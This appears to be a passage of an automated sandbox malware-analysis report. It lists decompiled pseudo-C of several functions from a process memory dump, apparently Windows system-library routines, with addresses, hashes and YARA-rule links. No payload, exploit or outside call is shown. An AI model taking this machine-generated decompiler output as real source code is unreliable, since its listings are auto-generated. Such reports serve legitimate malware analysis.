                                                                                                                          0x00ad1066
                                                                                                                          0x00ad106b
                                                                                                                          0x00ad1073
                                                                                                                          0x00ad1073
                                                                                                                          0x00ad0ed3
                                                                                                                          0x00ad0ed6
                                                                                                                          0x00ad0edc
                                                                                                                          0x00ad0ee0
                                                                                                                          0x00ad0ee7
                                                                                                                          0x00ad0ef0
                                                                                                                          0x00ad0ef5
                                                                                                                          0x00ad0efa
                                                                                                                          0x00ad0efc
                                                                                                                          0x00ad0efd
                                                                                                                          0x00ad0f03
                                                                                                                          0x00ad0f04
                                                                                                                          0x00ad0f06
                                                                                                                          0x00ad0f07
                                                                                                                          0x00ad0f09
                                                                                                                          0x00ad0f0e
                                                                                                                          0x00ad0f14
                                                                                                                          0x00ad0f23
                                                                                                                          0x00ad0f2d
                                                                                                                          0x00ad0f34
                                                                                                                          0x00ad0f34
                                                                                                                          0x00ad0f14
                                                                                                                          0x00ad0f52
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ad0f58
                                                                                                                          0x00ad0f73
                                                                                                                          0x00ad0f74
                                                                                                                          0x00ad0f79
                                                                                                                          0x00ad0f7d
                                                                                                                          0x00ad0f80
                                                                                                                          0x00ad0f86
                                                                                                                          0x00ad0fab
                                                                                                                          0x00ad0fb5
                                                                                                                          0x00ad0fc6
                                                                                                                          0x00ad0fd1
                                                                                                                          0x00ad0fe3
                                                                                                                          0x00ad0fd3
                                                                                                                          0x00ad0fdc
                                                                                                                          0x00ad0fdc
                                                                                                                          0x00ad0feb
                                                                                                                          0x00ad1009
                                                                                                                          0x00ad1009
                                                                                                                          0x00ad1015
                                                                                                                          0x00ad1027
                                                                                                                          0x00ad1017
                                                                                                                          0x00ad1020
                                                                                                                          0x00ad1020
                                                                                                                          0x00ad102f
                                                                                                                          0x00ad103c
                                                                                                                          0x00ad103c
                                                                                                                          0x00ad1048
                                                                                                                          0x00ad1050
                                                                                                                          0x00ad1050
                                                                                                                          0x00ad1055
                                                                                                                          0x00000000
                                                                                                                          0x00ad1055
                                                                                                                          0x00ad0f88
                                                                                                                          0x00ad0f9e
                                                                                                                          0x00ad0fa2
                                                                                                                          0x00ad0fa9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ad0fa9
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-2679148245
                                                                                                                          • Opcode ID: d4f1f04b4bf4fcc10e3576e2c9ed7b6b9c53492b065ad91510a07ec271108f18
                                                                                                                          • Instruction ID: b0ad254f79347ff7a19db155fa0c59605785568555545602cec22acd95574d1a
                                                                                                                          • Opcode Fuzzy Hash: d4f1f04b4bf4fcc10e3576e2c9ed7b6b9c53492b065ad91510a07ec271108f18
                                                                                                                          • Instruction Fuzzy Hash: 0751BD702083419FD324EF28D981F2BB7E5EBC8304F14092EF99697391D674E845CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A3F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 75%
                                                                                                                          			E00A3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00A24120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00A49830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00A49990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00A495D0();
							goto L11;
						} else {
							_t109 = L00A24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00A4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00A495D0();
										L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                          0x00a3f0d3
                                                                                                                          0x00a3f0d9
                                                                                                                          0x00a3f0e0
                                                                                                                          0x00a3f0e7
                                                                                                                          0x00a3f0f2
                                                                                                                          0x00a3f0f4
                                                                                                                          0x00a3f0f8
                                                                                                                          0x00a3f100
                                                                                                                          0x00a3f108
                                                                                                                          0x00a3f10d
                                                                                                                          0x00a3f115
                                                                                                                          0x00a3f116
                                                                                                                          0x00a3f11f
                                                                                                                          0x00a3f123
                                                                                                                          0x00a3f124
                                                                                                                          0x00a3f12c
                                                                                                                          0x00a3f130
                                                                                                                          0x00a3f134
                                                                                                                          0x00a3f13d
                                                                                                                          0x00a3f144
                                                                                                                          0x00a3f14b
                                                                                                                          0x00a3f152
                                                                                                                          0x00a7bab0
                                                                                                                          0x00a7bab0
                                                                                                                          0x00a3f158
                                                                                                                          0x00a3f158
                                                                                                                          0x00a3f15a
                                                                                                                          0x00a3f160
                                                                                                                          0x00a3f165
                                                                                                                          0x00a3f166
                                                                                                                          0x00a3f16f
                                                                                                                          0x00a3f173
                                                                                                                          0x00a7baa7
                                                                                                                          0x00a7baa7
                                                                                                                          0x00a7baab
                                                                                                                          0x00000000
                                                                                                                          0x00a3f179
                                                                                                                          0x00a3f18d
                                                                                                                          0x00a3f191
                                                                                                                          0x00a7baa2
                                                                                                                          0x00000000
                                                                                                                          0x00a3f197
                                                                                                                          0x00a3f19b
                                                                                                                          0x00a3f1a2
                                                                                                                          0x00a3f1a9
                                                                                                                          0x00a3f1af
                                                                                                                          0x00a3f1b2
                                                                                                                          0x00a3f1b6
                                                                                                                          0x00a3f1b9
                                                                                                                          0x00a3f1c4
                                                                                                                          0x00a3f1d8
                                                                                                                          0x00a3f1df
                                                                                                                          0x00a3f1e3
                                                                                                                          0x00a3f1eb
                                                                                                                          0x00a3f1ee
                                                                                                                          0x00a3f1f4
                                                                                                                          0x00a3f20f
                                                                                                                          0x00a7bab7
                                                                                                                          0x00a7babb
                                                                                                                          0x00a7bacc
                                                                                                                          0x00a7bad1
                                                                                                                          0x00a3f215
                                                                                                                          0x00a3f218
                                                                                                                          0x00a3f226
                                                                                                                          0x00a3f22b
                                                                                                                          0x00000000
                                                                                                                          0x00a3f22b
                                                                                                                          0x00a3f1f6
                                                                                                                          0x00a3f1f6
                                                                                                                          0x00a3f1f9
                                                                                                                          0x00a3f1fb
                                                                                                                          0x00a3f1fb
                                                                                                                          0x00a3f1f4
                                                                                                                          0x00a3f191
                                                                                                                          0x00a3f173
                                                                                                                          0x00a3f152
                                                                                                                          0x00a3f203

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                          • Instruction ID: 7ac300e83e49efdf077e8cb262ce3df5332da90de7f9f0d5a4745a534e73e031
                                                                                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                          • Instruction Fuzzy Hash: 3151BF71504710AFC320DF18C841A6BB7F8FF88710F108A2EF99587691E7B4E914CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A83540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 75%
                                                                                                                          			E00A83540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xafd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00A40BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00A83706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00A4FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00A83540;
						E00A4FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00A5DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00A90C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00A497C0();
					}
					return E00A4B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00A83971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00A83884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00A4FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00A49650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00A83787(_a4,  &_v352, _t80);
						}
					}
					L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00A495D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                          0x00a83552
                                                                                                                          0x00a8355a
                                                                                                                          0x00a8355d
                                                                                                                          0x00a83566
                                                                                                                          0x00a83567
                                                                                                                          0x00a8357e
                                                                                                                          0x00a8358f
                                                                                                                          0x00a835a1
                                                                                                                          0x00a835a5
                                                                                                                          0x00a8366b
                                                                                                                          0x00a8366b
                                                                                                                          0x00a8366d
                                                                                                                          0x00a83672
                                                                                                                          0x00a83679
                                                                                                                          0x00a83685
                                                                                                                          0x00a8368d
                                                                                                                          0x00a8369d
                                                                                                                          0x00a836a7
                                                                                                                          0x00a836b8
                                                                                                                          0x00a836c6
                                                                                                                          0x00a836c7
                                                                                                                          0x00a836dc
                                                                                                                          0x00a836e1
                                                                                                                          0x00a836e7
                                                                                                                          0x00a836e9
                                                                                                                          0x00a836e9
                                                                                                                          0x00a83703
                                                                                                                          0x00a83703
                                                                                                                          0x00a835b5
                                                                                                                          0x00a835c0
                                                                                                                          0x00a835c4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a835ca
                                                                                                                          0x00a835d7
                                                                                                                          0x00a835e2
                                                                                                                          0x00a835e6
                                                                                                                          0x00a835e8
                                                                                                                          0x00a835f5
                                                                                                                          0x00a835fa
                                                                                                                          0x00a83603
                                                                                                                          0x00a83604
                                                                                                                          0x00a83609
                                                                                                                          0x00a8360a
                                                                                                                          0x00a83612
                                                                                                                          0x00a83613
                                                                                                                          0x00a8361e
                                                                                                                          0x00a83622
                                                                                                                          0x00a83628
                                                                                                                          0x00a8362f
                                                                                                                          0x00a8362f
                                                                                                                          0x00a83636
                                                                                                                          0x00a83638
                                                                                                                          0x00a8363b
                                                                                                                          0x00a83642
                                                                                                                          0x00a83642
                                                                                                                          0x00a83636
                                                                                                                          0x00a83657
                                                                                                                          0x00a83657
                                                                                                                          0x00a8365c
                                                                                                                          0x00a83662
                                                                                                                          0x00a83669
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BinaryHash
                                                                                                                          • API String ID: 0-2202222882
                                                                                                                          • Opcode ID: 92115e028d99a685c7cf2c7f83ce4559ae7b671b414029394f142ac0387d2ca9
                                                                                                                          • Instruction ID: e9e7ccfca829ce7869b29cea771d416ba4f282ea60c894c804f5cdd4194f6aa0
                                                                                                                          • Opcode Fuzzy Hash: 92115e028d99a685c7cf2c7f83ce4559ae7b671b414029394f142ac0387d2ca9
                                                                                                                          • Instruction Fuzzy Hash: 004134B2D0152CAADF21EA54CD81FAFB77CAB44714F0045A5FA09A7241EB709F888F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00AD05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E00AD05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00AD07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00A49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00ACA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00ACA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00AD1293(_t79, _v40, E00AD07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00A27D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00AC138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                                          0x00ad05c5
                                                                                                                          0x00ad05ca
                                                                                                                          0x00ad05d3
                                                                                                                          0x00ad06db
                                                                                                                          0x00ad06db
                                                                                                                          0x00ad06dd
                                                                                                                          0x00ad06e3
                                                                                                                          0x00ad06e3
                                                                                                                          0x00ad05dd
                                                                                                                          0x00ad05e7
                                                                                                                          0x00ad05f6
                                                                                                                          0x00ad0600
                                                                                                                          0x00ad0607
                                                                                                                          0x00ad0610
                                                                                                                          0x00ad0615
                                                                                                                          0x00ad061a
                                                                                                                          0x00ad061c
                                                                                                                          0x00ad061e
                                                                                                                          0x00ad0624
                                                                                                                          0x00ad0625
                                                                                                                          0x00ad0627
                                                                                                                          0x00ad0628
                                                                                                                          0x00ad0631
                                                                                                                          0x00ad0640
                                                                                                                          0x00ad064d
                                                                                                                          0x00ad0654
                                                                                                                          0x00ad0654
                                                                                                                          0x00ad0631
                                                                                                                          0x00ad066d
                                                                                                                          0x00ad0674
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ad0692
                                                                                                                          0x00ad069e
                                                                                                                          0x00ad06b0
                                                                                                                          0x00ad06a0
                                                                                                                          0x00ad06a9
                                                                                                                          0x00ad06a9
                                                                                                                          0x00ad06b8
                                                                                                                          0x00ad06d6
                                                                                                                          0x00ad06d6
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-2679148245
                                                                                                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                          • Instruction ID: ebd27ecc455230b733f08cc740488fd09cb61839920bd9a10b1e179672f1dd7a
                                                                                                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                          • Instruction Fuzzy Hash: 55310032204305ABE720DF28CD85F9B77D9AB84754F04422AF9499B380E6B0ED14CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A83884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E00A83884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00A49650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00A24620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00A49650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                          0x00a83893
                                                                                                                          0x00a83896
                                                                                                                          0x00a83899
                                                                                                                          0x00a8389f
                                                                                                                          0x00a838a0
                                                                                                                          0x00a838a4
                                                                                                                          0x00a838a9
                                                                                                                          0x00a838ac
                                                                                                                          0x00a838ad
                                                                                                                          0x00a838ae
                                                                                                                          0x00a838af
                                                                                                                          0x00a838b1
                                                                                                                          0x00a838b4
                                                                                                                          0x00a838bb
                                                                                                                          0x00a838bc
                                                                                                                          0x00a838bd
                                                                                                                          0x00a838c4
                                                                                                                          0x00a838c8
                                                                                                                          0x00a838ca
                                                                                                                          0x00a838ca
                                                                                                                          0x00a838d5
                                                                                                                          0x00a8393e
                                                                                                                          0x00a83940
                                                                                                                          0x00a83942
                                                                                                                          0x00a83952
                                                                                                                          0x00a83954
                                                                                                                          0x00a83961
                                                                                                                          0x00a83961
                                                                                                                          0x00a83967
                                                                                                                          0x00a8396e
                                                                                                                          0x00a8396e
                                                                                                                          0x00a83947
                                                                                                                          0x00a8394c
                                                                                                                          0x00000000
                                                                                                                          0x00a8394c
                                                                                                                          0x00a838ea
                                                                                                                          0x00a838ee
                                                                                                                          0x00a838f8
                                                                                                                          0x00a838f9
                                                                                                                          0x00a838ff
                                                                                                                          0x00a83900
                                                                                                                          0x00a83902
                                                                                                                          0x00a83903
                                                                                                                          0x00a8390b
                                                                                                                          0x00a8390f
                                                                                                                          0x00a83950
                                                                                                                          0x00000000
                                                                                                                          0x00a83950
                                                                                                                          0x00a83915
                                                                                                                          0x00a8391d
                                                                                                                          0x00a8391d
                                                                                                                          0x00a83922
                                                                                                                          0x00a83926
                                                                                                                          0x00000000
                                                                                                                          0x00a83928
                                                                                                                          0x00a8392b
                                                                                                                          0x00a8392b
                                                                                                                          0x00a83935
                                                                                                                          0x00a83937
                                                                                                                          0x00a83937
                                                                                                                          0x00000000
                                                                                                                          0x00a83935
                                                                                                                          0x00a83926
                                                                                                                          0x00a838f0
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BinaryName
                                                                                                                          • API String ID: 0-215506332
                                                                                                                          • Opcode ID: 9cfc92d4d871a6c205327b44b28a34cd357fc4fb9f7894cbbdeda0e2d9996d65
                                                                                                                          • Instruction ID: 0b7abd95a9f2a6d073b304b0e18b8b8e1880a36ba10355433a952b41a69d76d2
                                                                                                                          • Opcode Fuzzy Hash: 9cfc92d4d871a6c205327b44b28a34cd357fc4fb9f7894cbbdeda0e2d9996d65
                                                                                                                          • Instruction Fuzzy Hash: DA31FF3390161AAFEF15EB59C955E6FF7B4EB80B20F114169E915A7280D7709F00CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A3D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 33%
                                                                                                                          			E00A3D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xafd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00A24120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00A4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00A498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00A495D0();
					L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                          0x00a3d29c
                                                                                                                          0x00a3d2a6
                                                                                                                          0x00a3d2b1
                                                                                                                          0x00a3d2b5
                                                                                                                          0x00a3d2b6
                                                                                                                          0x00a3d2bc
                                                                                                                          0x00a3d2bd
                                                                                                                          0x00a3d2be
                                                                                                                          0x00a3d2bf
                                                                                                                          0x00a3d2c2
                                                                                                                          0x00a3d2c4
                                                                                                                          0x00a3d2cc
                                                                                                                          0x00a3d384
                                                                                                                          0x00a3d34b
                                                                                                                          0x00a3d34f
                                                                                                                          0x00a3d350
                                                                                                                          0x00a3d351
                                                                                                                          0x00a3d35c
                                                                                                                          0x00a3d35c
                                                                                                                          0x00a3d2d6
                                                                                                                          0x00a3d2da
                                                                                                                          0x00a3d2e1
                                                                                                                          0x00a3d361
                                                                                                                          0x00a3d369
                                                                                                                          0x00a3d36d
                                                                                                                          0x00a3d2e3
                                                                                                                          0x00a3d2e3
                                                                                                                          0x00a3d2e3
                                                                                                                          0x00a3d2e5
                                                                                                                          0x00a3d2ed
                                                                                                                          0x00a3d2f5
                                                                                                                          0x00a3d2fa
                                                                                                                          0x00a3d302
                                                                                                                          0x00a3d303
                                                                                                                          0x00a3d30b
                                                                                                                          0x00a3d30f
                                                                                                                          0x00a3d313
                                                                                                                          0x00a3d318
                                                                                                                          0x00a3d31c
                                                                                                                          0x00a3d320
                                                                                                                          0x00a3d379
                                                                                                                          0x00a3d37d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a7affe
                                                                                                                          0x00a7b001
                                                                                                                          0x00a7b011
                                                                                                                          0x00000000
                                                                                                                          0x00a3d322
                                                                                                                          0x00a3d322
                                                                                                                          0x00a3d330
                                                                                                                          0x00a3d337
                                                                                                                          0x00a3d35d
                                                                                                                          0x00a3d339
                                                                                                                          0x00a3d33f
                                                                                                                          0x00a3d38c
                                                                                                                          0x00a3d38c
                                                                                                                          0x00a3d33f
                                                                                                                          0x00a3d349
                                                                                                                          0x00000000
                                                                                                                          0x00a3d349

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 7992a603b20944b3ee807ad58242e79523889c08d04db2d249a3de31b1138e7f
                                                                                                                          • Instruction ID: 48e00be39d0e2604ca411ab797330c0f9f7078641b07bae151945c98412b4a8c
